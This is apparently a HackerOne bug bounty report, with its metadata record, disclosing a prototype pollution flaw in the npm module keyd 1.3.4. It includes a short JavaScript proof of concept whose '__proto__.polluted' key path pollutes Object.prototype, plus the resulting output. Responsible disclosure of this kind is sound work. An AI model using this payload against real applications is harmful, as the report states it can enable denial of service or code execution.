I would like to report a `prototype pollution` vulnerability in `keyd` module.
It allows an attacker to inject properties on Object.prototype.
# Module
**module name:** `keyd`
**version:** `1.3.4`
**npm page:** `https://www.npmjs.com/package/keyd`
## Module Description
A small library for using and manipulating key paths in JavaScript.
## Module Stats
[71] weekly downloads
# Vulnerability
## Vulnerability Description
The `set` function can be used to add/modify properties of the Object prototype. These properties will be present on all objects.
## Steps To Reproduce:
- install `keyd` module:
- `npm i keyd`
Set the `__proto__.polluted` property of an object:
```javascript
const keyd = require('keyd');
const obj = {};
console.log("Before : " + obj.polluted);
keyd({}).set('__proto__.polluted', 'yes');
console.log("After : " + obj.polluted);
```
Output:
```console
Before : undefined
After : yes
```
{F833532}
## Supporting Material/References:
- OPERATING SYSTEM VERSION: Ubuntu 18.04.4 LTS
- NODEJS VERSION: v14.1.0
- NPM VERSION: 6.14.5
# Wrap up
- I contacted the maintainer to let them know: [N]
- I opened an issue in the related repository: [N]
Thank you for your time.
best regards,
d3lla
## Impact
The impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection.
{"id": "H1:877515", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Node.js third-party modules: [keyd] Prototype pollution", "description": "I would like to report a `prototype pollution` vulnerability in `keyd` module.\nIt allows an attacker to inject properties on Object.prototype.\n\n# Module\n\n**module name:** `keyd`\n**version:** `1.3.4`\n**npm page:** `https://www.npmjs.com/package/keyd`\n\n## Module Description\n\nA small library for using and manipulating key paths in JavaScript.\n\n## Module Stats\n\n[71] weekly downloads\n\n# Vulnerability\n\n## Vulnerability Description\n\nThe `set` function can be used to add/modify properties of the Object prototype. These properties will be present on all objects.\n\n## Steps To Reproduce:\n- install `keyd` module:\n - `npm i keyd`\n\nSet the `__proto__.polluted` property of an object:\n```javascript\n\nconst keyd = require('keyd');\nconst obj = {};\nconsole.log(\"Before : \" + obj.polluted);\nkeyd({}).set('__proto__.polluted', 'yes');\nconsole.log(\"After : \" + obj.polluted);\n```\nOutput:\n```console\n\nBefore : undefined\nAfter : yes\n```\n{F833532}\n\n## Supporting Material/References:\n\n- OPERATING SYSTEM VERSION: Ubuntu 18.04.4 LTS\n- NODEJS VERSION: v14.1.0\n- NPM VERSION: 6.14.5\n\n# Wrap up\n\n- I contacted the maintainer to let them know: [N] \n- I opened an issue in the related repository: [N] \n\n\nThank you for your time.\n\nbest regards,\n\nd3lla\n\n## Impact\n\nThe impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection.", "published": "2020-05-18T19:58:29", "modified": "2020-09-14T10:51:47", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/877515", "reporter": "d3lla", "references": [], "cvelist": [], "lastseen": "2020-09-14T11:51:05", "viewCount": 1, "enchantments": {"dependencies": {}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "bounty": 0.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/nodejs-ecosystem", "handle": "nodejs-ecosystem", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/023/949/3ea3b2ae039a8f955a4a8fe65d99fe85dc817398_original./3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/023/949/3ea3b2ae039a8f955a4a8fe65d99fe85dc817398_original./eb31823a4cc9f6b6bb4db930ffdf512533928a68a4255fb50a83180281a60da5"}}, "h1reporter": {"disabled": false, "username": "d3lla", "url": "/d3lla", "profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "is_me?": false, "cleared": false, "hackerone_triager": false, "hacker_mediation": false}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645703407}}
Node.js third-party modules: [keyd] Prototype pollution